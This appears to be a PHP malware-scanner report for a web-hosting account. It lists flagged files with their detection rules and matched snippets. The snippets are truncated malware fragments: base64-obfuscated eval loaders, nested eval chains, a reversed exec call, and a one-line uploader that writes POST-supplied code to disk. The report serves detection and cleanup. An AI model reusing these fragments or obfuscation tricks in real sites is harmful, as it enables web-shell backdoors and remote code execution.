Exploit base64_long Warning Long Base64 encoded text is usually used for the obfuscation of malicious code | <?php 'eJy091O0bk0QJQpunm3rbNu2bdvftm3btm3btm3btnn6r7q3atzurqceo/NhjRWZEZEz5lqRGcFN+f89dDgY/hvuDNo676VT2soygkLyMuIkFKyyFqJMompKtoKCZqr28ip6FNYGrib/f3n4cP8PHPIiIk4KZnZ6JBTWWppqehRWHKbG4lLSKur/zZg4G1ib2lp4mlG4mjg6OjsR2Dq6OJs4cv8/dKwNDO2szbilHDXl2P6X5PX/cPr/FQ+BrZ2Fs5Gtiym3Dvv/gQDe/4dvbh22/4PC/72VDzenqKahjR7J/wL1Pzhl/f8m1NbCkMndxJyC0tnWgoLmPx0Whv8j8f/vev+3b4r/gjZ0ceL9v8X/uQfz/8/mXpT/a/5/Uv2/mfDx4f7P3Ol/ReLDzfQ/d+CltvgvSiMSXrr/uepl4mRt8j/l/0ukZODltSChMLXgpjQgodFh+j+hsjIysOc1+g/3/7VKY0FC8x+k/3D+b2gG/zmyJeH...
| Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval] | <?php eval($WBZyL($AlFWd($WQIKf('eJy091O0bk0QJQpunm3rbNu2bdvftm3btm3btm3btnn6r7q3atzurqceo/NhjRWZEZEz5lqRGcFN+f89dDgY/hvuDNo676VT2soygkLyMuIkFKyyFqJMompKtoKCZqr28ip6FNYGrib/f3n4cP8PHPIiIk4KZnZ6JBTWWppqehRWHKbG4lLSKur/zZg4G1ib2lp4mlG4mjg6OjsR2Dq6OJs4cv8/dKwNDO2szbilHDXl2P6X5PX/cPr/FQ+BrZ2Fs5Gtiym3Dvv/gQDe/4dvbh22/4PC/72VDzenqKahjR7J/wL1Pzhl/f8m1NbCkMndxJyC0tnWgoLmPx0Whv8j8f/vev+3b4r/gjZ0ceL9v8X/uQfz/8/mXpT/a/5/Uv2/mfDx4f7P3Ol/ReLDzfQ/d+CltvgvSiMSXrr/uepl4mRt8j/l/0ukZODltSChMLXgpjQgodFh+j+hsjIysOc1+g/3/...
| Sign 7830f7a6 Line: 1 Dangerous Malware Signature (hash: 7830f7a6) | <?php n0CL
| Sign f9dc0a55 Dangerous Malware Signature (hash: f9dc0a55) | <?php 'base64_decode'
|
|
/custdata02/turtle/public_html/suspended.page/index.php Size: 13.95 kB Created: 2024-06-01 05:39:22 Modified: 2024-06-01 08:12:22 Dangers: 6
| Description | Match |
|---|
Exploit global_var_string Dangerous Code Injection, through escaped global vars, allow inject attackers to execute PHP code on the target machine via HTTP request | <?php ${"_GET"}
| Exploit hex_char Line: 2 Dangerous Hex char is usually used for the obfuscation of malicious code | <?php \x5f
| Exploit hex_var Line: 2 Dangerous Hex var technique is usually used for the obfuscation of malicious code, it is also used by IonCube | <?php ${"\x47\x4c\x4f\x42\x41\x4c\x53"}
| Sign 237750ea Line: 2 Dangerous Malware Signature (hash: 237750ea) | <?php \x47\x4c\x4f\x42\x41\x4c\x53
| Sign 301ca578 Dangerous Malware Signature (hash: 301ca578) | <?php trojan
| Sign 407651f7 Line: 2 Dangerous Malware Signature (hash: 407651f7) | <?php w/cGhw
|
|
/custdata02/turtle/public_html/suspended.page/search.php Size: 9.96 kB Created: 2022-05-03 00:39:41 Modified: 2024-06-04 00:39:41 Warns: 1 Dangers: 2
| Description | Match |
|---|
Exploit align Line: 6 Warning Code alignment technique is usually used for the obfuscation of malicious code | <?php $l1fh2s=$GLOBALS["b6b6666"]($l1SiN);$l1FpxA=$l1k($l1fh2s["host"],isset($l1fh2s["port"])
| Exploit reversed Line: 6 Dangerous Reverse function technique is used for the obfuscation of dangerous PHP functions | <?php ecalper_rts
| Function strrev exec_strrev Line: 6 Dangerous Encoded Function `exec` [https://www.php.net/exec] | <?php cexe
|
|
/custdata02/turtle/public_html/suspended.page/Z6AWFvIweoR.php Size: 43.48 kB Created: 2024-06-04 19:34:30 Modified: 2024-06-04 19:34:30 Warns: 2 Dangers: 1
| Description | Match |
|---|
Exploit base64_long Warning Long Base64 encoded text is usually used for the obfuscation of malicious code | <?php 'QbhXIRHo/dbKpv/Ny3X8vP/GuWFFk5WMN0y2B3q54C81VpXtXi3JnTAqrbl1PaiT91wXfpWHbJyxRsf6AWT+xAl9a7pjyZpeMPTwfcWfdYwyW9ws8nXJQjx9kNf2YdYMK+7R8u+NGDUtL0t0qrt2fggS5PHf6pVEFyLo4IXcPCmVj7W1tOu7SFfLnCKHFG6fNLvFXOyy0t9FZjJ5TDMtDBrKaCNdTOU2XOpF0JmZp4BTVweIKPcR8iDIqGk1k8H2EogAyFUSqlTcLMAEYpZmgBkW6lMlpTfP0IxFKI85COyTvsHQ5RRU9k3+DDIDvMik5z3Oe5NmVX2CCCJSpH7d9/6NzmHaRAsM6WeSlCKTnBTrCHAi8xHMfmQixSHkPiv9FDDDWF1EtWZrcnUkKGF2bzJrcnUgYWJ2Z3BhaHN7KSldMFtdo8RbRllOT0JZVCQoZmdmdmtyX2FidmdwYWhzIShzdgo7KSkpOC0gLG4wazAsJwAApyL...
| Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval] | <?php eval($SIunp($udwGf($IgvuO($xqlbS('QbhXIRHo/dbKpv/Ny3X8vP/GuWFFk5WMN0y2B3q54C81VpXtXi3JnTAqrbl1PaiT91wXfpWHbJyxRsf6AWT+xAl9a7pjyZpeMPTwfcWfdYwyW9ws8nXJQjx9kNf2YdYMK+7R8u+NGDUtL0t0qrt2fggS5PHf6pVEFyLo4IXcPCmVj7W1tOu7SFfLnCKHFG6fNLvFXOyy0t9FZjJ5TDMtDBrKaCNdTOU2XOpF0JmZp4BTVweIKPcR8iDIqGk1k8H2EogAyFUSqlTcLMAEYpZmgBkW6lMlpTfP0IxFKI85COyTvsHQ5RRU9k3+DDIDvMik5z3Oe5NmVX2CCCJSpH7d9/6NzmHaRAsM6WeSlCKTnBTrCHAi8xHMfmQixSHkPiv9FDDDWF1EtWZrcnUkKGF2bzJrcnUgYWJ2Z3BhaHN7KSldMFtdo8RbRllOT0JZVCQoZmdmdmtyX2FidmdwYW...
| Sign f9dc0a55 Dangerous Malware Signature (hash: f9dc0a55) | <?php 'base64_decode'
|
|
/custdata02/turtle/public_html/suspended.page/9hFw7kCvDiG.php Size: 166.77 kB Created: 2024-06-04 19:34:30 Modified: 2024-06-04 19:34:30 Dangers: 2
| Description | Match |
|---|
Sign 963e968a Line: 4341 Dangerous Malware Signature (hash: 963e968a) | <?php php_uname()
| Sign a408f408 Line: 1732 Dangerous Malware Signature (hash: a408f408) | <?php cmd.exe
|
|
/custdata02/turtle/public_html/suspended.page/ly7aFQKurL1.php Size: 51.81 kB Created: 2024-06-04 19:34:30 Modified: 2024-06-04 19:34:30 Warns: 2 Dangers: 3
| Description | Match |
|---|
Exploit base64_long Warning Long Base64 encoded text is usually used for the obfuscation of malicious code | <?php 'VTIlpz9lK3WypT9lqTyhMluSK0SZGS5SK05CIRyQEFx7MTIznJ5yXPsYcitaYPNawFpcBlEUGR9PDHkGJ8hz+S0tCFOyrUOfo2EyXPq8OUjRsNVaYPOarzyhMzkuqTHbp3Ivp3ElXPpsvjtNNNNNNNNXYW3KwggDqRJOVS8GCeP3EknWiKr+OBl9vW1RCw6pBO7LLkzDXA57mw5eFoFzYv4xopo/+p/36m/+/Fa+17/iXVkP72/8/29O/74wBLdvBNe/h/KssuG3//6nWzgOLC+qS9zHS//+6LOlpm+8k+YW/gd/8TV6Dt3cJpUdf/qtsxgY3r9UGcJJTsUq+heib83B6zwwOmLj5MVDt1p06wAJpFNKdl9I0ixoyQDtFQ42U82VnEq3bizYstzzFjugoFAL+/PkXC9tKSldib82BM6yDL2WZwrPy5iuafYTbID1UdSdLOzPdo/ibPOMSS2EE3H6xqv+wQc5Rg5VpBJefHMVmPCYH6B...
| Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval] | <?php eval($MuUwa($tIRhZ('VTIlpz9lK3WypT9lqTyhMluSK0SZGS5SK05CIRyQEFx7MTIznJ5yXPsYcitaYPNawFpcBlEUGR9PDHkGJ8hz+S0tCFOyrUOfo2EyXPq8OUjRsNVaYPOarzyhMzkuqTHbp3Ivp3ElXPpsvjtNNNNNNNNXYW3KwggDqRJOVS8GCeP3EknWiKr+OBl9vW1RCw6pBO7LLkzDXA57mw5eFoFzYv4xopo/+p/36m/+/Fa+17/iXVkP72/8/29O/74wBLdvBNe/h/KssuG3//6nWzgOLC+qS9zHS//+6LOlpm+8k+YW/gd/8TV6Dt3cJpUdf/qtsxgY3r9UGcJJTsUq+heib83B6zwwOmLj5MVDt1p06wAJpFNKdl9I0ixoyQDtFQ42U82VnEq3bizYstzzFjugoFAL+/PkXC9tKSldib82BM6yDL2WZwrPy5iuafYTbID1UdSdLOzPdo/ibPOMSS2EE3H6xqv+wQc5...
| Function strrev eval_strrev Line: 1 Dangerous Encoded Function `eval` [https://www.php.net/eval] | <?php LAve
| Sign 7830f7a6 Line: 1 Dangerous Malware Signature (hash: 7830f7a6) | <?php N0YX
| Sign f9dc0a55 Dangerous Malware Signature (hash: f9dc0a55) | <?php 'base64_decode'
|
|
/custdata02/turtle/public_html/suspended.page/9jYRvBQTbK7.php Size: 38.68 kB Created: 2024-06-04 19:34:30 Modified: 2024-06-04 19:34:30 Warns: 1
| Description | Match |
|---|
Function eval Line: 164 Warning Potentially dangerous function `eval` [https://www.php.net/eval] | <?php eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(_TOpUgAAnRVE2EiM5($GLOBALS[˦ø][0x00008])))))))))))))))))))
|
|
/custdata02/turtle/public_html/suspended.page/theme-inszlbn.php Size: 338.00 B Created: 2024-06-04 19:34:30 Modified: 2024-06-04 19:34:30 Dangers: 2
| Description | Match |
|---|
Exploit download_remote_code2 Line: 1 Dangerous RFU (Remote File Upload), via HTTP, allow to write malicious code on the target machine | <?php fwrite(fopen(trim($_POST['name']), 'w'), $b4(trim($_POST['message'])
| Sign f9dc0a55 Dangerous Malware Signature (hash: f9dc0a55) | <?php 'base64_decode'
|
|
/custdata02/turtle/public_html/suspended.page/m7hiydpTbg9.php Size: 43.51 kB Created: 2024-06-04 19:51:06 Modified: 2024-06-04 19:51:06 Warns: 2 Dangers: 1
| Description | Match |
|---|
Exploit base64_long Warning Long Base64 encoded text is usually used for the obfuscation of malicious code | <?php 'eJy0/FOUbk0QJgyWbdu2bduut2zbtm3rlG3btk7Ztnnm6/5X96yZ7qtZa/Jirx2ZkZFPPDt2ZsRN8lL/35oeF9N/zYZJV69kRFdCW0FRRFuNjEpKxM5BW1peSotT1chJWVhcW92Aysveyvn/zw8/3v8BScfJQUvZgIxKx9zFxoDKQVKVm8lF4j/Z2cLey8XI3c6VysrZzMzCnMjIzNLC2Yz3f2t42TsYe7nyemrL2tpwmyv+rw6f/23x/+IWkZGxu4WjkaULrx7n/0kE//+2zavH8X+O/r9X8uM1cpaQdZA1IPtfqP4Ht+z/B7FG7g4sNs5uVNQWRu5UdP+psDH93/j//1T7X6ap/nPawdKc/3/J/3MN1v/f5/tQ/++R/8n1/+bC7z933B3M/5cvfrws/3MNflr3/xx1JONn+J+jPs7mXs7/U/5/RGomfn53MioXd15qezI6PZb/Cy5PR3sTfsf/gP8/g3TuZHT/YfoP6f/GZv8/UJH...
| Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval] | <?php eval($fpwQi($fCjKH($LElTj($HJrhk('eJy0/FOUbk0QJgyWbdu2bduut2zbtm3rlG3btk7Ztnnm6/5X96yZ7qtZa/Jirx2ZkZFPPDt2ZsRN8lL/35oeF9N/zYZJV69kRFdCW0FRRFuNjEpKxM5BW1peSotT1chJWVhcW92Aysveyvn/zw8/3v8BScfJQUvZgIxKx9zFxoDKQVKVm8lF4j/Z2cLey8XI3c6VysrZzMzCnMjIzNLC2Yz3f2t42TsYe7nyemrL2tpwmyv+rw6f/23x/+IWkZGxu4WjkaULrx7n/0kE//+2zavH8X+O/r9X8uM1cpaQdZA1IPtfqP4Ht+z/B7FG7g4sNs5uVNQWRu5UdP+psDH93/j//1T7X6ap/nPawdKc/3/J/3MN1v/f5/tQ/++R/8n1/+bC7z933B3M/5cvfrws/3MNflr3/xx1JONn+J+jPs7mXs7/U/5/RGomfn53MioXd15qezI6PZb/Cy5PR3...
| Sign f9dc0a55 Dangerous Malware Signature (hash: f9dc0a55) | <?php 'base64_decode'
|
|
/custdata02/turtle/public_html/suspended.page/bX3JdAHPNTW.php Size: 166.77 kB Created: 2024-06-04 19:51:06 Modified: 2024-06-04 19:51:06 Dangers: 2
| Description | Match |
|---|
Sign 963e968a Line: 4341 Dangerous Malware Signature (hash: 963e968a) | <?php php_uname()
| Sign a408f408 Line: 1732 Dangerous Malware Signature (hash: a408f408) | <?php cmd.exe
|
|
/custdata02/turtle/public_html/suspended.page/dJCoA2SFH8E.php Size: 51.33 kB Created: 2024-06-04 19:51:06 Modified: 2024-06-04 19:51:06 Warns: 2 Dangers: 2
| Description | Match |
|---|
Exploit base64_long Warning Long Base64 encoded text is usually used for the obfuscation of malicious code | <?php 'eJy091O0bk0QJQpunm3rbNu2bdvftm3btm3btm3btnn6r7q3atzurqceo/NhjRWZEZEz5lqRGcFN+f89dDgY/hvuDNo676VT2soygkLyMuIkFKyyFqJMompKtoKCZqr28ip6FNYGrib/f3n4cP8PHPIiIk4KZnZ6JBTWWppqehRWHKbG4lLSKur/zZg4G1ib2lp4mlG4mjg6OjsR2Dq6OJs4cv8/dKwNDO2szbilHDXl2P6X5PX/cPr/FQ+BrZ2Fs5Gtiym3Dvv/gQDe/4dvbh22/4PC/72VDzenqKahjR7J/wL1Pzhl/f8m1NbCkMndxJyC0tnWgoLmPx0Whv8j8f/vev+3b4r/gjZ0ceL9v8X/uQfz/8/mXpT/a/5/Uv2/mfDx4f7P3Ol/ReLDzfQ/d+CltvgvSiMSXrr/uepl4mRt8j/l/0ukZODltSChMLXgpjQgodFh+j+hsjIysOc1+g/3/7VKY0FC8x+k/3D+b2gG/zmyJeH...
| Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval] | <?php eval($UbskV($gbWJv($UMwGZ('eJy091O0bk0QJQpunm3rbNu2bdvftm3btm3btm3btnn6r7q3atzurqceo/NhjRWZEZEz5lqRGcFN+f89dDgY/hvuDNo676VT2soygkLyMuIkFKyyFqJMompKtoKCZqr28ip6FNYGrib/f3n4cP8PHPIiIk4KZnZ6JBTWWppqehRWHKbG4lLSKur/zZg4G1ib2lp4mlG4mjg6OjsR2Dq6OJs4cv8/dKwNDO2szbilHDXl2P6X5PX/cPr/FQ+BrZ2Fs5Gtiym3Dvv/gQDe/4dvbh22/4PC/72VDzenqKahjR7J/wL1Pzhl/f8m1NbCkMndxJyC0tnWgoLmPx0Whv8j8f/vev+3b4r/gjZ0ceL9v8X/uQfz/8/mXpT/a/5/Uv2/mfDx4f7P3Ol/ReLDzfQ/d+CltvgvSiMSXrr/uepl4mRt8j/l/0ukZODltSChMLXgpjQgodFh+j+hsjIysOc1+g/3/...
| Sign 7830f7a6 Line: 1 Dangerous Malware Signature (hash: 7830f7a6) | <?php n0CL
| Sign f9dc0a55 Dangerous Malware Signature (hash: f9dc0a55) | <?php 'base64_decode'
|
|
/custdata02/turtle/public_html/suspended.page/QK2qeFI356M.php Size: 38.68 kB Created: 2024-06-04 19:51:06 Modified: 2024-06-04 19:51:06 Warns: 1
| Description | Match |
|---|
Function eval Line: 164 Warning Potentially dangerous function `eval` [https://www.php.net/eval] | <?php eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(_TOpUgAAnRVE2EiM5($GLOBALS[˦ø][0x00008])))))))))))))))))))
|
|
/custdata02/turtle/public_html/suspended.page/theme-insxdsb.php Size: 338.00 B Created: 2024-06-04 19:51:06 Modified: 2024-06-04 19:51:06 Dangers: 2
| Description | Match |
|---|
Exploit download_remote_code2 Line: 1 Dangerous RFU (Remote File Upload), via HTTP, allow to write malicious code on the target machine | <?php fwrite(fopen(trim($_POST['name']), 'w'), $b4(trim($_POST['message'])
| Sign f9dc0a55 Dangerous Malware Signature (hash: f9dc0a55) | <?php 'base64_decode'
|
|
/custdata02/turtle/public_html/turtlesys.com/speedtest/speedtest/wp/HngYW.php Size: 30.13 kB Created: 2024-06-01 06:29:58 Modified: 2024-06-01 08:12:22 Warns: 3 Dangers: 21
| Description | Match |
|---|
Exploit base64_long Line: 1 Warning Long Base64 encoded text is usually used for the obfuscation of malicious code | <?php "ZXZhbCgiPz4iLmJhc2U2NF9kZWNvZGUoIlBEOXdhSEFnYUdWaFpHVnlLQ2REYjI1MFpXNTBMVlI1Y0dVNklIUmxlSFF2YUhSdGJEc2dZMmhoY25ObGREMTFkR1l0T0NjcE95QkFjMlYwWDNScGJXVmZiR2x0YVhRb01DazdDbVZ5Y205eVgzSmxjRzl5ZEdsdVp5Z3dLVHNLYzJWemMybHZibDl6ZEdGeWRDZ3BPd3BwWmlnaGFYTnpaWFFvSkY5VFJWTlRTVTlPV3lkcmF5ZGRLU2w3Q2lBZ0lDQWtYMU5GVTFOSlQwNWJKMnRySjEwZ1BTQWtYMUpGVVZWRlUxUmJKMnRySjEwN0NuMEthV1lvSkY5VFJWTlRTVTlPV3lkcmF5ZGRJQ0U5SUNjeU1ESXpKeWw3Q2dsbFkyaHZJQ2RyYXljN0NpQWdJQ0JsZUdsMEtDazdDbjBLSkhSNWNHVWdQU0FrWDFKRlVWVkZVMVJiSjNSNWN...
| Exploit base64_long Warning Long Base64 encoded text is usually used for the obfuscation of malicious code | <?php "PD9waHAgaGVhZGVyKCdDb250ZW50LVR5cGU6IHRleHQvaHRtbDsgY2hhcnNldD11dGYtOCcpOyBAc2V0X3RpbWVfbGltaXQoMCk7CmVycm9yX3JlcG9ydGluZygwKTsKc2Vzc2lvbl9zdGFydCgpOwppZighaXNzZXQoJF9TRVNTSU9OWydrayddKSl7CiAgICAkX1NFU1NJT05bJ2trJ10gPSAkX1JFUVVFU1RbJ2trJ107Cn0KaWYoJF9TRVNTSU9OWydrayddICE9ICcyMDIzJyl7CgllY2hvICdrayc7CiAgICBleGl0KCk7Cn0KJHR5cGUgPSAkX1JFUVVFU1RbJ3R5cGUnXTsKJHBhdGggPSAkX1JFUVVFU1RbJ3BhdGgnXTsKJGRhdGEgPSAkX1NFUlZFUjsKJHdlYnNpdGVfcGF0aCA9ICRkYXRhWydET0NVTUVOVF9ST09UJ107CiRmaWxlX3BhdGggPSAkZGF0YVsnU0N...
| Exploit eval_base64 Dangerous RCE (Remote Code Execution), through Base64 text, allow remote attackers to execute arbitrary commands or code on the target machine | <?php eval(base64_decode("ZXZhbCgiPz4iLmJhc2U2NF9kZWNvZGUoIlBEOXdhSEFnYUdWaFpHVnlLQ2REYjI1MFpXNTBMVlI1Y0dVNklIUmxlSFF2YUhSdGJEc2dZMmhoY25ObGREMTFkR1l0T0NjcE95QkFjMlYwWDNScGJXVmZiR2x0YVhRb01DazdDbVZ5Y205eVgzSmxjRzl5ZEdsdVp5Z3dLVHNLYzJWemMybHZibDl6ZEdGeWRDZ3BPd3BwWmlnaGFYTnpaWFFvSkY5VFJWTlRTVTlPV3lkcmF5ZGRLU2w3Q2lBZ0lDQWtYMU5GVTFOSlQwNWJKMnRySjEwZ1BTQWtYMUpGVVZWRlUxUmJKMnRySjEwN0NuMEthV1lvSkY5VFJWTlRTVTlPV3lkcmF5ZGRJQ0U5SUNjeU1ESXpKeWw3Q2dsbFkyaHZJQ2RyYXljN0NpQWdJQ0JsZUdsMEtDazdDbjBLSkhSNWNHVWdQU0FrWDFK...
| Exploit eval_comment Line: 1 Dangerous RCE (Remote Code Execution) allow remote attackers to execute arbitrary commands or code on the target machine | <?php eval/*-Q:W_IWXyhu7W{z8#)h;d9rA1jO@^p6oF%ToE?W|!UZh{<.G{6,3lu-*/(/*-ryKHdO(|-*/base64_decode/*-.A_~$RrcA-*/(/*-z9Tu8uS^x-*/"ZXZhbCgiPz4iLmJhc2U2NF9kZWNvZGUoIlBEOXdhSEFnYUdWaFpHVnlLQ2REYjI1MFpXNTBMVlI1Y0dVNklIUmxlSFF2YUhSdGJEc2dZMmhoY25ObGREMTFkR1l0T0NjcE95QkFjMlYwWDNScGJXVmZiR2x0YVhRb01DazdDbVZ5Y205eVgzSmxjRzl5ZEdsdVp5Z3dLVHNLYzJWemMybHZibDl6ZEdGeWRDZ3BPd3BwWmlnaGFYTnpaWFFvSkY5VFJWTlRTVTlPV3lkcmF5ZGRLU2w3Q2lBZ0lDQWtYMU5GVTFOSlQwNWJKMnRySjEwZ1BTQWtYMUpGVVZWRlUxUmJKMnRySjEwN0NuMEthV1lvSkY5VFJWTlRTV...
| Exploit execution Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] | <?php eval(base64_decode("ZXZhbCgiPz4iLmJhc2U2NF9kZWNvZGUoIlBEOXdhSEFnYUdWaFpHVnlLQ2REYjI1MFpXNTBMVlI1Y0dVNklIUmxlSFF2YUhSdGJEc2dZMmhoY25ObGREMTFkR1l0T0NjcE95QkFjMlYwWDNScGJXVmZiR2x0YVhRb01DazdDbVZ5Y205eVgzSmxjRzl5ZEdsdVp5Z3dLVHNLYzJWemMybHZibDl6ZEdGeWRDZ3BPd3BwWmlnaGFYTnpaWFFvSkY5VFJWTlRTVTlPV3lkcmF5ZGRLU2w3Q2lBZ0lDQWtYMU5GVTFOSlQwNWJKMnRySjEwZ1BTQWtYMUpGVVZWRlUxUmJKMnRySjEwN0NuMEthV1lvSkY5VFJWTlRTVTlPV3lkcmF5ZGRJQ0U5SUNjeU1ESXpKeWw3Q2dsbFkyaHZJQ2RyYXljN0NpQWdJQ0JsZUdsMEtDazdDbjBLSkhSNWNHVWdQU0FrWDFK...
| Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval] | <?php eval(base64_decode("ZXZhbCgiPz4iLmJhc2U2NF9kZWNvZGUoIlBEOXdhSEFnYUdWaFpHVnlLQ2REYjI1MFpXNTBMVlI1Y0dVNklIUmxlSFF2YUhSdGJEc2dZMmhoY25ObGREMTFkR1l0T0NjcE95QkFjMlYwWDNScGJXVmZiR2x0YVhRb01DazdDbVZ5Y205eVgzSmxjRzl5ZEdsdVp5Z3dLVHNLYzJWemMybHZibDl6ZEdGeWRDZ3BPd3BwWmlnaGFYTnpaWFFvSkY5VFJWTlRTVTlPV3lkcmF5ZGRLU2w3Q2lBZ0lDQWtYMU5GVTFOSlQwNWJKMnRySjEwZ1BTQWtYMUpGVVZWRlUxUmJKMnRySjEwN0NuMEthV1lvSkY5VFJWTlRTVTlPV3lkcmF5ZGRJQ0U5SUNjeU1ESXpKeWw3Q2dsbFkyaHZJQ2RyYXljN0NpQWdJQ0JsZUdsMEtDazdDbjBLSkhSNWNHVWdQU0FrWDFK...
| Sign 0f37c730 Dangerous Malware Signature (hash: 0f37c730) | <?php mdW5jdGlvb
| Sign 11413268 Dangerous Malware Signature (hash: 11413268) | <?php eval("?>".base64_decode
| Sign 162cf671 Dangerous Malware Signature (hash: 162cf671) | <?php hcnJheV
| Sign 407651f7 Dangerous Malware Signature (hash: 407651f7) | <?php w/cGhw
| Sign 7186bb8d Dangerous Malware Signature (hash: 7186bb8d) | <?php RfUE9TV
| Sign 7830f7a6 Dangerous Malware Signature (hash: 7830f7a6) | <?php N0cl
| Sign 7f5d33bf Dangerous Malware Signature (hash: 7f5d33bf) | <?php JF9QT1NU
| Sign 7f5d33bf Line: 1 Dangerous Malware Signature (hash: 7f5d33bf) | <?php Jhc2U2N
| Sign 91535293 Dangerous Malware Signature (hash: 91535293) | <?php lY2hv
| Sign 963e968a Dangerous Malware Signature (hash: 963e968a) | <?php PD9waH
| Sign a408f408 Dangerous Malware Signature (hash: a408f408) | <?php c3Rhd
| Sign ae7830db Dangerous Malware Signature (hash: ae7830db) | <?php yZXBsYWNl
| Sign bced5841 Dangerous Malware Signature (hash: bced5841) | <?php 8P3Boc
| Sign d97f004d Dangerous Malware Signature (hash: d97f004d) | <?php ZnVuY3Rpb2
| Sign d97f004d Line: 1 Dangerous Malware Signature (hash: d97f004d) | <?php ZXZhb
| Sign de12c454 Dangerous Malware Signature (hash: de12c454) | <?php VjaG
| Sign de12c454 Line: 1 Dangerous Malware Signature (hash: de12c454) | <?php V2YW
| Sign e6546205 Dangerous Malware Signature (hash: e6546205) | <?php kX1JFUVVFU1
|
|
/custdata02/turtle/public_html/turtlesys.com/StmVPF4W3E6.php Size: 43.44 kB Created: 2024-06-01 02:25:29 Modified: 2024-06-01 08:12:22 Warns: 2 Dangers: 3
| Description | Match |
|---|
Exploit base64_long Warning Long Base64 encoded text is usually used for the obfuscation of malicious code | <?php 'R6P3Wyqb/zcto/Lz/wYWtUpOVjDdZtgdtueFIjC80bd41qx0wKq25aD2ok/TCk3mdh3pduQtn+gJ+5uQKfnkxcPny2zdw8GvFn2kMMlvdKP5oyC40fZDX9m72DTn2UZJejRg1LS9YZ6q7aX4IEuTx3+qVYRci6OCF3D1PNY+1tbTru1VKqx05U0UYlkisoq52WWlvqT8xV0qxloYNZT6RrqzymqJMqWnMzNPAIyUDxBR4SPoQZFQ7HvkXezlEAGQkCV0j7hZgElZLBcA4i30jCjaXx+hGaRSHnIRkk77B0CUUR/VG/gziA72NJOc9znuTc0h9gggiRaR+3ff+jCwzpdJdZu2lEpQdYQxkQyc4KDzEcx+cSLFIeQ+K/0UMMNLXVG1ZmtydSQoYXZvMmtydSBhYnZncGFoc3spKV0wW12jxFtGWU5PQllUJChmZ2Z2a3JfYWJ2Z3BhaHMhKHN2CjspKSk4LSAsbjBrMCwnAACnIv/IEUI...
| Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval] | <?php eval($DiNjf($zrfJC($PcQnr($kNdXC('R6P3Wyqb/zcto/Lz/wYWtUpOVjDdZtgdtueFIjC80bd41qx0wKq25aD2ok/TCk3mdh3pduQtn+gJ+5uQKfnkxcPny2zdw8GvFn2kMMlvdKP5oyC40fZDX9m72DTn2UZJejRg1LS9YZ6q7aX4IEuTx3+qVYRci6OCF3D1PNY+1tbTru1VKqx05U0UYlkisoq52WWlvqT8xV0qxloYNZT6RrqzymqJMqWnMzNPAIyUDxBR4SPoQZFQ7HvkXezlEAGQkCV0j7hZgElZLBcA4i30jCjaXx+hGaRSHnIRkk77B0CUUR/VG/gziA72NJOc9znuTc0h9gggiRaR+3ff+jCwzpdJdZu2lEpQdYQxkQyc4KDzEcx+cSLFIeQ+K/0UMMNLXVG1ZmtydSQoYXZvMmtydSBhYnZncGFoc3spKV0wW12jxFtGWU5PQllUJChmZ2Z2a3JfYWJ2Z3BhaHMhKH...
| Sign 7830f7a6 Line: 1 Dangerous Malware Signature (hash: 7830f7a6) | <?php NVCh
| Sign ae7830db Line: 1 Dangerous Malware Signature (hash: ae7830db) | <?php y2HY
| Sign f9dc0a55 Dangerous Malware Signature (hash: f9dc0a55) | <?php 'base64_decode'
|
|
/custdata02/turtle/public_html/turtlesys.com/zsiyq4vMHTl.php Size: 51.36 kB Created: 2024-06-01 02:25:29 Modified: 2024-06-01 08:12:22 Warns: 2 Dangers: 2
| Description | Match |
|---|
Exploit base64_long Warning Long Base64 encoded text is usually used for the obfuscation of malicious code | <?php 'eJy091O0bk0QJQpunm3rbNu2bdvftm3btm3btm3btnn6r7q3atzurqceo/NhjRWZEZEz5lqRGcFN+f89dDgY/hvuDNo676VT2soygkLyMuIkFKyyFqJMompKtoKCZqr28ip6FNYGrib/f3n4cP8PHPIiIk4KZnZ6JBTWWppqehRWHKbG4lLSKur/zZg4G1ib2lp4mlG4mjg6OjsR2Dq6OJs4cv8/dKwNDO2szbilHDXl2P6X5PX/cPr/FQ+BrZ2Fs5Gtiym3Dvv/gQDe/4dvbh22/4PC/72VDzenqKahjR7J/wL1Pzhl/f8m1NbCkMndxJyC0tnWgoLmPx0Whv8j8f/vev+3b4r/gjZ0ceL9v8X/uQfz/8/mXpT/a/5/Uv2/mfDx4f7P3Ol/ReLDzfQ/d+CltvgvSiMSXrr/uepl4mRt8j/l/0ukZODltSChMLXgpjQgodFh+j+hsjIysOc1+g/3/7VKY0FC8x+k/3D+b2gG/zmyJeH...
| Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval] | <?php eval($WBZyL($AlFWd($WQIKf('eJy091O0bk0QJQpunm3rbNu2bdvftm3btm3btm3btnn6r7q3atzurqceo/NhjRWZEZEz5lqRGcFN+f89dDgY/hvuDNo676VT2soygkLyMuIkFKyyFqJMompKtoKCZqr28ip6FNYGrib/f3n4cP8PHPIiIk4KZnZ6JBTWWppqehRWHKbG4lLSKur/zZg4G1ib2lp4mlG4mjg6OjsR2Dq6OJs4cv8/dKwNDO2szbilHDXl2P6X5PX/cPr/FQ+BrZ2Fs5Gtiym3Dvv/gQDe/4dvbh22/4PC/72VDzenqKahjR7J/wL1Pzhl/f8m1NbCkMndxJyC0tnWgoLmPx0Whv8j8f/vev+3b4r/gjZ0ceL9v8X/uQfz/8/mXpT/a/5/Uv2/mfDx4f7P3Ol/ReLDzfQ/d+CltvgvSiMSXrr/uepl4mRt8j/l/0ukZODltSChMLXgpjQgodFh+j+hsjIysOc1+g/3/...
| Sign 7830f7a6 Line: 1 Dangerous Malware Signature (hash: 7830f7a6) | <?php n0CL
| Sign f9dc0a55 Dangerous Malware Signature (hash: f9dc0a55) | <?php 'base64_decode'
|
|
/custdata02/turtle/public_html/turtlesys.com/remUL13kiT4.php Size: 43.48 kB Created: 2024-06-04 19:34:41 Modified: 2024-06-04 19:34:41 Warns: 2 Dangers: 1
| Description | Match |
|---|
